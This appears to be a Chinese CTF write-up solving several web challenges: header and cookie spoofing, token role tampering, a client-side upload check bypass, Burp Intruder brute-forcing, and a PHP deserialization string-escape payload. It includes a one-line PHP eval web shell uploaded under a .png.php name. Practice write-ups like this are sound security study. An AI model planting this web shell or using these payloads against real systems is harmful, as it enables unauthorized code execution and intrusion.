文章目录
- web
- http
- cookie
- 彼岸的flag
- moe图床
- 大海捞针
- 夺命十三枪
web
http
连接到本地后,题目给了我们任务
- 第一个是要求我们GET传参
UwU=u
- 第二个是要求我们POST传参
Luv=u
- 第三个是要求我们cookie值为
admin
- 第四个是要求我们来自
127.0.0.1
- 第五个是要求我们用
MoeBrowser浏览器
在此之前先要学会用bp抓本地包
我们win+R打开cmd,然后输入
ipconfig
将下面的ip复制,把题目的localhost改掉,即可抓本地包
bp抓包,添加我们的参数,得到flag
cookie
打开题目,按照给的提示
我们先到./register
,POST传参json数据
{"username":"dog","password":"123456"
}
然后再到./login
登陆一下
{"username":"dog","password":"123456"
}
查看./flag
,结果不行
尝试注册admin用户发现已存在,结合提示可以修改cookie值
抓包./status
,将token解码发现是加密过的
我们修改一下role
为admin
,再次编码,尝试在./status
替换原来的token
然后访问./flag
发现还是不行,于是直接访问./flag
抓包修改cookie值
得到flag
彼岸的flag
打开题目(F12发现巨佬博客,原来是web前端知识)
发现有问题
直接选取元素,得到flag
moe图床
文件上传类型的题目
然后F12发现只允许上传png格式
if (!file){alert('请选择一个文件进行上传!');return;
}const allowedExtensions = ['png'];const fileExtension = file.name.split('.').pop().toLowerCase();if (!allowedExtensions.includes(fileExtension)) {alert('只允许上传后缀名为png的文件!');return;
}
分析一下
const allowedExtensions = ['png'];
定义了一个名为 allowedExtensions 的数组,其中包含允许上传的文件扩展名。在这个例子中,只允许上传扩展名为 ‘png’ 的文件。
const fileExtension = file.name.split('.').pop().toLowerCase();
从 file 对象中提取文件扩展名。它使用 split() 方法根据点 (.) 分隔符将文件名拆分为数组,并使用 pop() 获取结果数组的最后一个元素,该元素表示文件扩展名。toLowerCase() 方法将文件扩展名转换为小写,以进行大小写不敏感的比较。
这样看只需要我们上传的文件名里面包含png的拓展名即可绕过
前提,我们还只能上传png绕过js前端检测
我们创建1.png
<?php @eval($_POST[shell]);?>
然后bp抓包修改文件名为1.png.php
,上传成功
然后蚁剑连接
得到flag
大海捞针
打开题目,给了提示
应该说的是GET传参id可以连接到不同宇宙,id的值从1到1000
一个个找太麻烦了,结合提示
应该是要爆破
我们直接bp抓包丢到instruder,添加payload位置
设置payload集为从1到1000
开始爆破,发现?id=676
的长度最特殊,猜测有flag
我们直接访问,发现是另外一道题彼岸的flag
出现过的
直接查看页面源代码,搜索一下得到flag
夺命十三枪
源代码
<?php
highlight_file(__FILE__);require_once('Hanxin.exe.php');$Chant = isset($_GET['chant']) ? $_GET['chant'] : '夺命十三枪';$new_visitor = new Omg_It_Is_So_Cool_Bring_Me_My_Flag($Chant);$before = serialize($new_visitor);
$after = Deadly_Thirteen_Spears::Make_a_Move($before);
echo 'Your Movements: ' . $after . '<br>';try{echo unserialize($after);
}catch (Exception $e) {echo "Even Caused A Glitch...";
}
?>
Your Movements: O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:4:"test";s:11:"Spear_Owner";s:6:"Nobody";}
Far away from COOL...
我们再看下Hanxin.exe.php
<?phpif (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) {highlight_file(__FILE__);
}class Deadly_Thirteen_Spears{private static $Top_Secret_Long_Spear_Techniques_Manual = array("di_yi_qiang" => "Lovesickness","di_er_qiang" => "Heartbreak","di_san_qiang" => "Blind_Dragon","di_si_qiang" => "Romantic_charm","di_wu_qiang" => "Peerless","di_liu_qiang" => "White_Dragon","di_qi_qiang" => "Penetrating_Gaze","di_ba_qiang" => "Kunpeng","di_jiu_qiang" => "Night_Parade_of_a_Hundred_Ghosts","di_shi_qiang" => "Overlord","di_shi_yi_qiang" => "Letting_Go","di_shi_er_qiang" => "Decisive_Victory","di_shi_san_qiang" => "Unrepentant_Lethality");public static function Make_a_Move($move){foreach(self::$Top_Secret_Long_Spear_Techniques_Manual as $index => $movement){$move = str_replace($index, $movement, $move);}return $move;}
}class Omg_It_Is_So_Cool_Bring_Me_My_Flag{public $Chant = '';public $Spear_Owner = 'Nobody';function __construct($chant){$this->Chant = $chant;$this->Spear_Owner = 'Nobody';}function __toString(){if($this->Spear_Owner !== 'MaoLei'){return 'Far away from COOL...';}else{return "Omg You're So COOOOOL!!! " . getenv('FLAG');}}
}?>
分析一下
- 我们先看到出口
Omg_It_Is_So_Cool_Bring_Me_My_Flag.__toString()
,只要满足Spear_Owner为MaoLei就可得到flag - 往前推,当使用echo或者print输出对象时会调用此方法,源代码的
echo 'Your Movements: ' . $after . '<br>';
刚好满足
但是我们实例化Omg_It_Is_So_Cool_Bring_Me_My_Flag()
后,可以发现Spear_Owner的值我们是修改不了的。这就是个问题,我们怎么做到修改一个不可被修改的值呢
关键点在于Deadly_Thirteen_Spears.Make_a_Move()
,同时结合我们的目的,我们可以利用字符串逃逸来实现绕过
我们先随便传入test
我们的目标是
O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:4:"test";s:11:"Spear_Owner";s:6:"MaoLei";}
我们尝试把";s:11:"Spear_Owner";s:6:"MaoLei";}
写到Chant里面,然后把后面的部分挤掉
同时长度变为4+35
O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:39:"test";s:11:"Spear_Owner";s:6:"MaoLei";}";s:11:"Spear_Owner";s:6:"Nobody";}
这时候我们利用替换前后长度差与之相等
这里我选的是构造7*(di_qi_qiang),因为当它被替换后长度差为5,5*7刚好为我们要的
只要做到下面这样就可以得到flag,长度为39+35
O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:74:"di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}";s:11:"Spear_Owner";s:6:"Nobody";}
所以payload为
?chant=di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}
得到flag